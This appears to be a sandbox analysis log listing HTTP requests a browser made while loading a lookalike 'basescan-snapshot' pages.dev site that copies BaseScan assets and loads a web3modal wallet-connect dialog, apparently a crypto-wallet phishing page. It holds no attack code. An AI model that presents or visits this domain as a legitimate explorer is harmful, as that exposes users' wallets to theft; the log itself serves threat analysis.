            Source: global trafficHTTP traffic detected: GET /getWalletImage/45f2f08e-fc0c-4d62-3e63-404e72170500 HTTP/1.1Host: api.web3modal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-sdk-version: html-ethers5-3.2.1x-sdk-type: w3msec-ch-ua-mobile: ?0x-project-id: 9a504add1206ecb902aee52264862b81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/font-awesome/webfonts/fa-solid-900.ttf HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/font-awesome/webfonts/fa-light-300.ttf HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /getWalletImage/68e8063a-ff69-4941-3b40-af09e2fcd700 HTTP/1.1Host: api.web3modal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-sdk-version: html-ethers5-3.2.1x-sdk-type: w3msec-ch-ua-mobile: ?0x-project-id: 9a504add1206ecb902aee52264862b81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/svg/brands/metamask.svg HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/dist/websiteAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /assets/js/components/hs.go-to.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/components/hs.cubeportfolio.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/custom/combine-js-bottom2.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/custom/web3.min.js?v=0.5.2.2 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/custom/commonjs.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/clipboard/dist/clipboard.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/components/hs.clipboard.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/fancybox/jquery.fancybox.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/gen/metawin_20.png HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /jss/ace/ace.js HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/font-awesome/webfonts/fa-brands-400.ttf HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /d3d3/ZGVsaXZlcnk/YXN5bmNqcw==.php HTTP/1.1Host: eas.etherscan.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAGEO=2%7CUS%7CNA%7C%7CNew%20York%7C10118%7C40.7123%7C-74.0068%7C20%7CAmerica%2FNew_York%7C501%7CNY%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C
            Source: global trafficHTTP traffic detected: GET /assets/js/custom/web3-utils.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/custom/web3-eth.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/highcharts/js/v6/highcharts.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/main/loadingblock.svg HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/custom/commonjs_token.js?v=24.4.4.9 HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/dist/websiteAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /images/svg/brands/main.svg?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /public/getAssetImage/600a9a04-c1b9-42ca-6785-9b4b6ff85200 HTTP/1.1Host: api.web3modal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /public/getAssetImage/41d04d42-da3b-4453-8506-668cc0727900 HTTP/1.1Host: api.web3modal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /public/getAssetImage/ab9c186a-c52f-464b-2906-ca59d760a400 HTTP/1.1Host: api.web3modal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /public/getAssetImage/06b26297-fe0c-4733-5d6b-ffa5498aac00 HTTP/1.1Host: api.web3modal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/gen/stake-4_20.png HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /public/getAssetImage/7289c336-3981-4081-c5f4-efc26ac64a00 HTTP/1.1Host: api.web3modal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/gen/bcgame_20c.png HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/gen/bcgame_20a.png HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /getWallets?page=1&entries=4 HTTP/1.1Host: api.web3modal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/jquery-ui/jquery-ui.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/popper.js/dist/umd/popper.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/jquery-migrate/dist/jquery-migrate.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /up/script_asset/710c81a103.js HTTP/1.1Host: d107ul3j3wrui0.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/svg/brands/metamask.svg HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /jss/ace/theme-dawn.js HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /jss/ace/mode-csharp.js HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/jquery-mousewheel/3.1.13/jquery.mousewheel.min.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /assets/vendor/hs-megamenu/src/hs.megamenu.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /public/getAssetImage/692ed6ba-e569-459a-556a-776476829e00 HTTP/1.1Host: api.web3modal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/hs.core.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /public/getAssetImage/0c2840c3-5b04-4c44-9661-fbd4b49e1800 HTTP/1.1Host: api.web3modal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /public/getAssetImage/ef1a1fcf-7fe8-4d69-bd6d-fda1345b4400 HTTP/1.1Host: api.web3modal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /getWalletImage/7677b54f-3486-46e2-4e37-bf8747814f00 HTTP/1.1Host: api.web3modal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
